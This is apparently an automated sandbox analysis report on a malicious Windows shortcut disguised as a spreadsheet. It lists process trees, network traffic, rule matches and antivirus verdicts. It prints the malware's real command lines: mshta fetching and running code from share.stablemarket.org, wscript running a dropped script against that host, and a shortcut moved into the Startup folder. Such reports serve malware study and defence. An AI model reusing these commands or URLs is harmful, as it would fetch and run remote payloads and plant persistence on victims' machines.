Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 23, 2021, 10:21 a.m. | Oct. 23, 2021, 10:25 a.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "rBJLfVPM" "C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk"
2476-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
204-
mshta.exe C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I=
2128-
explorer.exe "C:\Windows\System32\explorer.exe" "https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true"
2692 -
cmd.exe "C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2 & move "C:\Users\test22\AppData\Local\Temp\UserAssist.lnk" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
2596-
wscript.exe wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1
2812 -
wscript.exe wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2
548
-
-
-
-
-
explorer.exe C:\Windows\Explorer.EXE
1924
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49176 149.28.162.113:443 |
None | None | None |
TLSv1 192.168.56.103:49184 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49194 142.250.66.46:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf |
TLSv1 192.168.56.103:49188 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49201 142.250.204.46:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf |
TLSv1 192.168.56.103:49203 142.250.204.110:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google-analytics.com | ad:1f:ae:67:67:34:63:1c:e5:ac:37:c2:88:8a:92:34:8c:6b:a3:b0 |
TLSv1 192.168.56.103:49171 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49208 142.250.66.99:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a |
TLSv1 192.168.56.103:49223 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49206 142.250.66.99:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a |
TLSv1 192.168.56.103:49220 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49202 142.250.66.138:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=upload.video.google.com | c5:11:f7:e2:30:7f:3e:fd:a5:5e:98:6c:9f:37:86:55:2f:83:6e:f4 |
TLSv1 192.168.56.103:49210 142.250.66.99:443 |
None | None | None |
TLSv1 192.168.56.103:49207 142.250.66.99:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a |
TLSv1 192.168.56.103:49217 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49219 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49211 142.250.66.99:443 |
None | None | None |
TLSv1 192.168.56.103:49216 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49222 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49226 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49229 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49225 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49195 142.250.66.46:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf |
TLSv1 192.168.56.103:49227 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49200 142.250.204.46:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.google.com | 34:f2:1e:53:07:94:5c:7d:ef:2c:d7:21:4d:3a:d2:8d:02:03:60:bf |
TLSv1 192.168.56.103:49228 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
TLSv1 192.168.56.103:49204 142.250.66.138:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=upload.video.google.com | c5:11:f7:e2:30:7f:3e:fd:a5:5e:98:6c:9f:37:86:55:2f:83:6e:f4 |
TLSv1 192.168.56.103:49209 142.250.66.99:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1C3 | CN=*.gstatic.com | b7:c0:7e:9a:54:ca:6d:c1:4a:4e:c0:7f:ea:f0:df:2d:86:10:a8:9a |
TLSv1 192.168.56.103:49230 149.28.162.113:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=stablemarket.org | 2b:56:85:9a:ca:17:73:6d:53:78:c7:1c:d2:2d:28:b2:92:c0:c7:95 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
suspicious_features | POST method with no referer header | suspicious_request | POST https://share.stablemarket.org/ |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I= |
request | GET https://docs.google.com/spreadsheets/d/1CTWarBPpx6kQjpevxr7qeQGPenjAR_7H/edit?usp=sharing&ouid=118006626630144401406&rtpof=true&sd=true |
request | POST https://share.stablemarket.org/ |
request | GET https://support.google.com/drive/answer/6283888 |
request | GET https://fonts.googleapis.com/css2?family=Google+Sans+Text:wght@400;500;700 |
request | GET https://www.google-analytics.com/analytics.js |
request | GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oPFTrmw.woff |
request | GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUp9-KzpRiLCAt4Unrc-xIKmCU5oLlVrmw.woff |
request | GET https://fonts.gstatic.com/s/googlesanstext/v16/5aUu9-KzpRiLCAt4Unrc-xIKmCU5mE4.woff |
request | GET https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff |
request | GET https://fonts.gstatic.com/s/roboto/v18/KFOlCnqEu92Fr1MmWUlfBBc-.woff |
request | GET https://support.google.com/favicon.ico |
request | POST https://share.stablemarket.org/ |
description | wscript.exe tried to sleep 120 seconds, actually delayed analysis time by 120 seconds |
domain | docs.google.com |
file | C:\Users\test22\AppData\Local\Temp\UserAssist.lnk |
file | C:\Users\test22\AppData\Local\Temp\pdgx.js |
file | C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UserAssist.lnk |
file | C:\Users\test22\AppData\Local\Temp\UserAssist.lnk |
file | C:\Users\test22\AppData\Local\Temp\Profit and Loss Statement.xlsx.lnk |
cmdline | C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I= |
cmdline | "C:\Windows\System32\cmd.exe" /c start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 1 & start /b wscript "C:\Users\test22\AppData\Local\Temp\pdgx.js" share.stablemarket.org/ 2 & move "C:\Users\test22\AppData\Local\Temp\UserAssist.lnk" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\" |
cmdline | "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I= |
url | https://share.stablemarket.org/Y5qbOQiIlBomxCjPRFzyiLSvyddx/P1xM4diDmKxL3I= |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Communications over P2P network | rule | Network_P2P_Win | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | Create a windows service | rule | Create_Service | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over FTP | rule | Network_FTP |
host | 117.18.232.200 |
file | C:\Windows\SysWOW64\wscript.exe |
Lionic | Trojan.WinLNK.Nioc.4!c |
CAT-QuickHeal | LNK.Agent.41324 |
ALYac | Heur.BZC.YAX.Nioc.1.078B6D01 |
Sangfor | Trojan.Generic-LNK.Save.6890a73b |
Arcabit | Heur.BZC.YAX.Nioc.1.078B6D01 |
ESET-NOD32 | LNK/Agent.GX |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.078B6D01 |
ViRobot | LNK.S.Downloader.22821 |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.078B6D01 |
Tencent | Heur:Trojan.Winlnk.Downloader.wya |
Ad-Aware | Heur.BZC.YAX.Nioc.1.078B6D01 |
Sophos | Troj/DownLnk-X |
DrWeb | LNK.Downloader.207 |
FireEye | Heur.BZC.YAX.Nioc.1.078B6D01 |
Emsisoft | Heur.BZC.YAX.Nioc.1.078B6D01 (B) |
Ikarus | Win32.Outbreak |
GData | Heur.BZC.YAX.Nioc.1.078B6D01 |
AhnLab-V3 | LNK/Autorun.Gen |
MAX | malware (ai score=96) |
VBA32 | suspected of Trojan.Link.URL |
Rising | Downloader.Mshta/LNK!1.BADA (CLASSIC) |
SentinelOne | Static AI - Malicious LNK |